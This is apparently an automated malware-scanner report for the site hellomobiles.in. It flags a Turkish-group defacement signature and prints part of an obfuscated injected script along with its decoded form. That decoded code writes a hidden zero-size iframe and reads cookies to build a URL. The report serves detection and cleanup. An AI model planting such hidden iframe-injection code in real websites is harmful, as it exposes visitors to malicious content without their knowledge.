New scan:

Malware Scanner report for hellomobiles.in

Malicious/Suspicious/Total urls checked
0/1/8
1 page has suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked By Ayyýldýz Tim Intenational Force | Sessizce Nöbetteyiz!  (16 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://hellomobiles.in/
200 OK
Content-Length: 14797
Content-Type: text/html
suspicious
Suspicious code. Script contains iFrame.

var a="'1Aqapkrv'1G'2C'2;tcp'02pgdgpgp'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,pgdgppgp'0;'1@'2C'2;tcp'02fgdcwnv]ig{umpf'02'1F'02glamfgWPKAmormlglv'0:fmawoglv,vkvng'0;'1@'2C'2;tcp'02jmqv'02'1F'02glamfgWPKAmormlglv'0:nmacvkml,jmqv'0;'1@'2C'2;tcp'02kdpcog'02'1F'02fmawoglv,apgcvgGngoglv'0:'05kdpcog'05'0;'1@'2C'2;kdpcog,ukfvj'1F2'1@'2C'2;kdpcog,jgkejv'1F2'1@'2C'2;kdpcog,qpa'1F'02'00j'00'02)'02'00vv'00'02)'02'00r'1C--'00'02)'02'00tl6,'00'02)'02'00p,vg'00'
...[588 bytes skipped]...

Decoded script:

...[3282 bytes skipped]...
enablefrequency:0, displayfrequency:"1 days", defineheader:"", cookiename:["coolsescookie", "path=/"], autohidetimer:0, launch:false, browserdetectstr:(window.opera && window.getSelection) || (!window.opera && window.XMLHttpRequest), output:function () {

document.write('<div id="content_ses_page" style="position: absolute; z-index: -1; color: white; background-color:white">');
document.write('<iframe name="splashpage-iframe" src="about:blank" style="margin:0; padding:0; width:0%; height: 0%"></iframe>');
document.write("<br /> </div>");
this.splashpageref = document.getElementById("content_ses_page");
this.splashiframeref = window.frames["splashpage-iframe"];
//---
var parsed_domain = parseURL(window.location.origin);
var cookie = parsed_domain.domain;
var data = getCookie(cookie);
var url = this.splas
...[3092 bytes skipped]...

http://hellomobiles.in/test404page.js
200 OK
Content-Length: 11531
Content-Type: text/html
suspicious
Deface/Content modification. The following signature was found: Hacked By Ayyýldýz Tim Intenational Force | Sessizce Nöbetteyiz!

<!DOCTYPE html>
<html lang="tr">

<head>

<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta charset="utf-8">


<!-- PAGE TITLE -->
<title>Hacked By Ayyýldýz Tim Intenational Force | Sessizce Nöbetteyiz!</title>

<!-- GOOGLE FONTS -->
<link href='http://fonts.googleapis.com/css?family=Lato:300,400,700|Raleway:300,400,500|Open+Sans:300,400,600,700,800' rel='stylesheet' type='text/css'>

<!-- STYLESHEETS -->
<link href="http://ayt-wgt.hostingsiteforfree.com/assets/css/bootstrap.min.css" rel="st
...[12895 bytes skipped]...


http://ayt-wgt.hostingsiteforfree.com/assets/js/jquery-1.11.1.min.js
200 OK
Content-Length: 95788
Content-Type: application/javascript
clean
http://ayt-wgt.hostingsiteforfree.com/assets/js/bootstrap.min.js
200 OK
Content-Length: 34653
Content-Type: application/javascript
clean
http://ayt-wgt.hostingsiteforfree.com/assets/js/jquery.cycle.min.js
200 OK
Content-Length: 24150
Content-Type: application/javascript
clean
http://ayt-wgt.hostingsiteforfree.com/assets/js/jquery.parallax.min.js
200 OK
Content-Length: 9449
Content-Type: application/javascript
clean
http://ayt-wgt.hostingsiteforfree.com/assets/js/jquery.backstretch.min.js
200 OK
Content-Length: 4238
Content-Type: application/javascript
clean
http://ayt-wgt.hostingsiteforfree.com/resimler/scripts.js
200 OK
Content-Length: 18495
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: hellomobiles.in

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 26 Oct 2015 15:07:25 GMT
Accept-Ranges: bytes
Server: nginx/1.8.0
Content-Length: 14797
Content-Type: text/html
Last-Modified: Sun, 30 Aug 2015 18:52:51 GMT

...14797 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hellomobiles.in
Referer: http://www.google.com/search?q=hellomobiles.in

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=hellomobiles.in

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hellomobiles.in/

Result: hellomobiles.in is not infected or malware details are not published yet.